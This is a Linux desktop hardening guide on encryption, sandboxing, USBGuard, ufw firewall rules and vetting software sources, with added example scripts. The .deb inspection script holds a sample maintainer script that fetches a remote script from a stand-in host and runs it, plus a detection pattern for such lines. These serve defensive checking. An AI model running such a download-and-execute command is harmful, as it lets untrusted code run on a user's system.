No system is absolutely secure!
No matter how many steps or processes you implement, there is always a potential security hole.
This guide presents a few ways to secure your system from intrusions, malicious software and unwanted connections. There is always a balance between security and convenience: the more secure your system is, the less convenient it is to use.
Who wants a “bricked” computer because it is so secure you can’t even use it?
Please use some of the suggestions below as a baseline to secure your system. Then implement more in the future as you learn how to manage them.
Linux Built-In Security
Every Linux distribution includes security features like other operating systems.
Users belong to groups and have access to their own files and data. Linux adds another layer of security when an application needs to run or be installed: the current user must be in the super user group and then enter a password whenever software is installed or permissions need to be changed. If you copy any executable files from one computer to another, the execute permissions are disabled. The root file system also has extra protection, requiring your super user password before any changes are made to its files or directories.
Local User Access
Creating a limited user account can be useful for secure browsing, gaming and personal use. This limited account cannot install any software, updates or packages. It does not store any files or data locally, as it is meant for temporary use. It is not a member of any Unix groups, which prevents sudo capabilities. If this account is compromised, there is no way to gain deeper access to the system through “sudo” or “su”. You can configure users who need “sudo” access to be in a group named wheel.
- Limited Account (no SU/Sudo access)
If you need to install a game or application, use the “Switch User” option from the logout button. Log in as a super user, install the software, then switch back to your limited user.
Note: If your distribution does not provide the “Switch User” option you will need to use the TTY shell and start your graphical environment. This is outside the scope of this guide.
Encryption does not protect your data from malicious threats or harmful software. Instead it protects your data from physical theft. Most Linux distributions include an application called dm-crypt.
You create a partition for your sensitive data (a LUKS partition). Once you unlock it, you can format and mount it, then use it for any purpose, even an operating system.
Another way to encrypt your hard drive is to use an “encryption layer”: you encrypt a directory on your hard drive. This can result in poorer performance but offers more flexibility.
Note: Do not encrypt your UEFI partition
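The LUKS workflow described above (create, unlock, format, mount, lock), as an added example using cryptsetup; this is not code from the original guide. DEVICE is a placeholder partition, and DRY_RUN=1 (the default) only prints the commands instead of running them.

```shell
#!/bin/sh
# Added example, not from the original guide: the LUKS workflow described above
# using cryptsetup (create, unlock, format, mount, lock). DEVICE is a placeholder;
# DRY_RUN=1 (default) only prints the commands, DRY_RUN=0 runs them as root.
DEVICE="${DEVICE:-/dev/sdX1}"            # placeholder partition, not a real target
MAPNAME="${MAPNAME:-secure_data}"        # unlocked device appears as /dev/mapper/$MAPNAME
MOUNTPOINT="${MOUNTPOINT:-/mnt/secure_data}"
DRY_RUN="${DRY_RUN:-1}"

run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi; }

# Guard against formatting a whole disk (which would wipe every partition on it,
# EFI partition included); only a partition node is accepted.
check_target() {
  case "$1" in
    /dev/sd[a-z]|/dev/vd[a-z]|/dev/nvme[0-9]n[0-9]|/dev/mmcblk[0-9]) return 1 ;;
  esac
  return 0
}

# One-time setup: format the partition as LUKS2, unlock it, put a filesystem inside.
luks_create() {
  check_target "$DEVICE" || { echo "refusing to format whole disk $DEVICE" >&2; return 1; }
  run cryptsetup luksFormat --type luks2 "$DEVICE"
  run cryptsetup open "$DEVICE" "$MAPNAME"
  run mkfs.ext4 "/dev/mapper/$MAPNAME"
  run cryptsetup close "$MAPNAME"
}

# Everyday use: unlock and mount; lock again when finished so the data is at rest.
luks_mount() {
  run cryptsetup open "$DEVICE" "$MAPNAME"
  run mkdir -p "$MOUNTPOINT"
  run mount "/dev/mapper/$MAPNAME" "$MOUNTPOINT"
}
luks_umount() {
  run umount "$MOUNTPOINT"
  run cryptsetup close "$MAPNAME"
}

luks_create && luks_mount && luks_umount
```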
File System Backup
Snapshots can roll your system back in time by creating a copy of your system files and configurations. If your system breaks or is compromised, you can roll back to an earlier date when it was stable and secure. There is also a risk of the snapshot backups themselves being compromised, so it is recommended to keep them on an external drive or a separate partition.
Note: The best method of cleaning up a compromised system is a fresh installation of Linux
Every motherboard has some type of firmware that communicates between the hardware and software. Legacy computers have what is called a BIOS, hosted on a chip on the motherboard. Newer systems have a bootloader called UEFI on a hard drive partition (FAT). Both have very similar settings, but UEFI offers significantly more settings and control than BIOS.
Entering your UEFI setup requires a reboot and pressing a keyboard key while booting. Every computer has security settings in UEFI to protect your hardware and firmware configurations.
Web browsers are one of the most common ways to exploit your system. Websites can cache (store) cookies, scripts, images and more on your local computer.
- Sandbox Firefox
- Noscript plugin
NoScript is a plugin that blocks all scripts that would run in the browser. You can then manually whitelist the scripts you want to enable for a specific webpage/URL.
Sandboxing is a better way to secure your browser, as it removes access to your /home/username directory. Firejail can be used for all applications on your system, but it can affect applications like Wine. Firejail provides profile templates (which may need to be installed separately) to configure what you want Firefox to be allowed to do.
Then run Firefox with the following command: firejail firefox
Now Firefox only has access to the Downloads directory (depending on the profile you use). If it is exploited by a malicious plugin, extension, script or other method, it only has access to Downloads, not to the rest of /home/username. It also prevents local scripts from being launched by your browser.
AppArmor can be configured with profiles that allow applications to access only what they need to run. If an application tries to access a system process or service that is out of scope, AppArmor denies it. The profiles are common to Linux software environments. This adds slightly more security on top of the default file permission restrictions on Linux.
External Devices (USB)
Your system firmware (UEFI) can be compromised with an external USB device: someone could steal your computer, use a USB flash drive to boot into their own operating system and access your files. Encryption can prevent this, but another layer of security helps by denying physical access.
- USB Guard
Every computer has the ability to secure its firmware with a password. This protects against malicious tampering and booting from USB devices. Make sure to configure your firmware to boot from the internal hard drive first. Keep the password in a secure location; losing it could “brick” your device as well.
USB Guard can deny all unauthorized USB access to a running Linux operating system only. You can manually whitelist each device you want to allow to communicate. The safest option is to deny all USB access completely, but obviously we might need a flash drive, external webcam, speakers or even a controller to use our system. USB Guard blocks devices at the kernel level by default.
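The whitelist approach above, as an added example that is not from the original guide: build a USBGuard rules file from a device listing, allow only the devices you choose, and block everything else. The device listing and ids are constructed, and the rules.conf and usbguard-daemon.conf paths are assumed to be the standard ones.

```shell
#!/bin/sh
# Added example, not from the original guide: build a USBGuard whitelist from a
# "usbguard list-devices" listing, allowing only chosen devices and blocking the
# rest. The listing and the device ids below are constructed, not from a real host.
DEVICES='1: allow id 1d6b:0002 serial "0000:00:14.0" name "xHCI Host Controller" via-port "usb1" with-interface 09:00:00
2: allow id 046d:c31c serial "" name "USB Keyboard" via-port "1-2" with-interface { 03:01:01 03:00:00 }
3: allow id 0781:5581 serial "4C530001" name "Ultra" via-port "1-3" with-interface 08:06:50'
ALLOWED_IDS="1d6b:0002 046d:c31c"   # vendor:product ids we choose to trust

# Emit one "allow ..." rule per trusted device (the listing line minus its
# "N: allow " prefix) followed by a bare "block", which denies everything else.
build_rules() {
  printf '%s\n' "$DEVICES" | sed 's/^[0-9]*: [a-z]* //' | while IFS= read -r dev; do
    id=$(printf '%s\n' "$dev" | sed 's/^id \([0-9a-f:]*\) .*/\1/')
    for a in $ALLOWED_IDS; do
      [ "$id" = "$a" ] && printf 'allow %s\n' "$dev"
    done
  done
  printf 'block\n'
}

# Audit a rules file: the last rule must be "block", and no rule may allow every
# mass-storage device (class 08) instead of one specific, identified device.
check_rules() {
  [ "$(printf '%s\n' "$1" | tail -n1)" = "block" ] || return 1
  printf '%s\n' "$1" | grep -q 'allow with-interface.*08:\*:\*' && return 2
  return 0
}

RULES=$(build_rules)
printf '%s\n' "$RULES"
check_rules "$RULES" && echo "rules ok"
# To apply as root (assumed standard paths): save the rules to /etc/usbguard/rules.conf,
# set ImplicitPolicyTarget=block in /etc/usbguard/usbguard-daemon.conf, then run
# "systemctl enable --now usbguard". "usbguard generate-policy" does the same for
# every device currently attached; review its output the same way before using it.
```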
Applications that run over a network, such as games, browsers and FTP, connect via ports through the operating system’s network configuration. Firewalls can protect your computer from malicious incoming connections from outside the computer. The most secure configuration is to DENY all incoming connections, then open ports as needed depending on the application you are using. By default, most Linux distributions have network-facing services disabled.
- gufw (With a Graphical User Interface)
Example: open port 22 to allow an SSH connection from the local network only.
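The example above worked through with ufw (the command-line tool behind gufw), as added code that is not from the original guide: deny all incoming traffic, allow SSH only from the LAN, then check the resulting status report. LAN_NET is a placeholder for your own network range, and DRY_RUN=1 (the default) only prints the commands.

```shell
#!/bin/sh
# Added example, not from the original guide: deny all incoming traffic with ufw,
# then allow SSH (port 22) only from the local network, and verify the result.
# Assumptions: ufw is installed; LAN_NET is a placeholder for your own LAN range.
LAN_NET="${LAN_NET:-192.168.1.0/24}"
# DRY_RUN=1 (default) only prints the ufw commands; DRY_RUN=0 applies them as root.
DRY_RUN="${DRY_RUN:-1}"

run() { if [ "$DRY_RUN" = "1" ]; then printf 'ufw %s\n' "$*"; else ufw "$@"; fi; }

# Rule set: deny everything inbound, allow outbound, SSH from the LAN only.
lan_only_ssh_rules() {
  run default deny incoming
  run default allow outgoing
  run allow from "$LAN_NET" to any port 22 proto tcp
  run --force enable
}

# Check a "ufw status verbose" report: succeed only if the incoming default is
# deny and no rule allows 22/tcp from Anywhere (i.e. the whole internet).
check_status() {
  printf '%s\n' "$1" | grep -q '^Default: deny (incoming)' || return 1
  printf '%s\n' "$1" | grep -qE '^22/tcp +ALLOW IN +Anywhere' && return 2
  return 0
}

# Constructed sample reports (not captured from a real host) for offline checks.
GOOD_STATUS='Status: active
Default: deny (incoming), allow (outgoing), disabled (routed)

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW IN    192.168.1.0/24'
BAD_STATUS='Status: active
Default: allow (incoming), allow (outgoing), disabled (routed)

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW IN    Anywhere'

lan_only_ssh_rules                      # prints the four ufw commands
check_status "$GOOD_STATUS" && echo "sample: locked down"
check_status "$BAD_STATUS"  || echo "sample: SSH open to the world"
```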
The majority of threats and malicious software is written to execute in a Windows environment and probably won’t affect your Linux processes. Some users have scanned their distribution with an antivirus and found threats, but after researching they found these were part of the definitions meant for Windows environments.
- Distribution Repositories
Repositories are collections of software packages. All your software and updates are installed from a repository. Distributions are normally configured to use their official repositories. You can also add your own depending on the software and updates you want to install.
Each repository is maintained by communities or individuals who create software and compile it into ready-to-use installations and updates. By using a Linux distribution, you are choosing to trust all officially packaged software provided by the people who package for your chosen distribution. Most distributions also allow adding unofficial repositories, such as PPAs for Ubuntu and Mint.
In Mint you can check the source of all the repositories by looking in the source file:
Each URL is a repository.
PPA (Personal Package Archive)
A PPA is a software repository you can add to your distribution to install software and/or updates for it. Anyone can create an unofficial repository and potentially include malicious software in it, so you should never blindly trust an unofficial source. Any PPA you add will also be listed in the source file:
For example, installing an application like simplescreenrecorder requires a PPA for it to update automatically.
Arch User Repository AUR
Arch users can additionally use the AUR to download source code and compile it themselves. This process is automated in the AUR, but it is important to inspect the PKGBUILD file to check the source code URLs, and to check any included patches or install scripts to verify nothing malicious is included. This can take some time if you aren’t familiar with the process.
Debian, Ubuntu, Mint and other Debian-based distributions can install applications via .deb packages.
Any developer can create a .deb installer, so it is important to investigate the maintainer or source before installing it. You can also inspect a .deb by opening it with Archive Manager, checking the directories and included files, then researching them online.
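The .deb inspection above done from the command line, as an added example that is not from the original guide: dpkg-deb lists the metadata and files, and the maintainer scripts in the control area (which run as root during installation) are scanned for lines worth a closer look. DEB is a placeholder path and the sample postinst is constructed.

```shell
#!/bin/sh
# Added example, not from the original guide: inspect a .deb before installing it.
# The control area is extracted with dpkg-deb; the maintainer scripts found there
# (preinst/postinst/prerm/postrm) run as root at install time, so they are the
# part worth reading. DEB is a placeholder path; the sample script is constructed.
DEB="${DEB:-/path/to/package.deb}"

# Print the lines of a maintainer script that fetch remote content, decode
# hidden payloads or set up persistence; returns 1 when nothing is flagged.
flag_script() {
  printf '%s\n' "$1" | grep -nE 'curl|wget|base64 -d|eval |/etc/cron|systemctl enable|\.bashrc|/etc/rc\.local'
}

# Show metadata, file list and flagged maintainer-script lines for one package.
inspect_deb() {
  [ -f "$1" ] || { echo "no such file: $1" >&2; return 1; }
  dpkg-deb -I "$1"                          # control file: Maintainer, Depends, ...
  dpkg-deb -c "$1"                          # every path the package will write
  dir=$(mktemp -d)
  dpkg-deb -e "$1" "$dir"                   # extract control area incl. scripts
  for s in preinst postinst prerm postrm; do
    [ -f "$dir/$s" ] || continue
    echo "== $s"
    flag_script "$(cat "$dir/$s")" || echo "(nothing flagged)"
  done
  rm -rf "$dir"
}

# Constructed postinst (not from any real package): a normal ldconfig call plus a
# line that downloads and executes a remote script, which the check should flag.
SAMPLE_POSTINST='#!/bin/sh
set -e
ldconfig
wget -qO- http://updates.example.invalid/extra.sh | sh
exit 0'

flag_script "$SAMPLE_POSTINST"              # prints "4:wget -qO- ... | sh"
if [ -f "$DEB" ]; then inspect_deb "$DEB"; fi
```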
Flatpak and Snap
Another way to obtain software from third-party repositories is through applications like Flatpak and Snap. These can install other unnecessary packages (aka bloatware), and any developer can add their package to them. Use them at your own risk and investigate software before installing it.